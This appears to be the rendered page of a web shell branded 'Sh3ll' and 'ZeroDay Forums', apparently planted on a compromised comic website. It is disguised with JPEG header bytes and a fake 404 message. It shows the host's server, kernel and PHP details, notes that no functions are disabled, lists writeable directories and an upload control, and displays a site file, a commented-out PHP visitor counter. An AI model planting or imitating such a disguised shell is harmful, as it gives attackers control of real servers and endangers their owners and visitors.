ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/truyentranh/include/functions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/truyentranh/include/functions/visitor_function.php
<?php
// RudderCount - Created by Ruddernation Designâ„¢ - https://www.ruddernation.com
// A the script to your selected page to start counting the number of visits you get,
// To display the counter add - Visitors: echo $Rcounter_count to the area.
/*$Rcounter_digit = 5;
$Rcounter_dpath = "/upload";
$Rcounter_fpath = "upload/visits.txt";
// Check if directory and file exists, if not then create it.
if (!file_exists($Rcounter_fpath)) {
    if (!is_dir($Rcounter_dpath)) {
        mkdir($Rcounter_dpath, 0700);
    }
    $Rcounter_fso = fopen($Rcounter_fpath,"w");
    flock($Rcounter_fso, 2);
    fputs($Rcounter_fso, 0);
    flock($Rcounter_fso, 3);
    fclose($Rcounter_fso);
}
$Rcounter_fso = fopen($Rcounter_fpath,"r+");
$Rcounter_count = fgets($Rcounter_fso, 4096);

if (!isset($_SESSION["Rcounter_DataCounter"]) or $_SESSION["Rcounter_DataCounter"] != $_SERVER['REMOTE_ADDR'] ) {
    $_SESSION["Rcounter_DataCounter"] = $_SERVER['REMOTE_ADDR'];
    fseek($Rcounter_fso, 0);
    flock($Rcounter_fso, 2);
    fputs($Rcounter_fso, $Rcounter_count+1);
    flock($Rcounter_fso, 3);
    fclose($Rcounter_fso);
    $Rcounter_count++;
    $Rcounter_DataCounter = $Rcounter_count;
}
$Rcounter_numlength = strlen((string) $Rcounter_count);
if ($Rcounter_numlength < $Rcounter_digit) {
    $Rcounter_lead = (int) $Rcounter_digit - $Rcounter_numlength;
    for ($i=0; $i<$Rcounter_lead; $i++) {
        $Rcounter_count = "0" . $Rcounter_count;  }}*/
?>

ZeroDay Forums Mini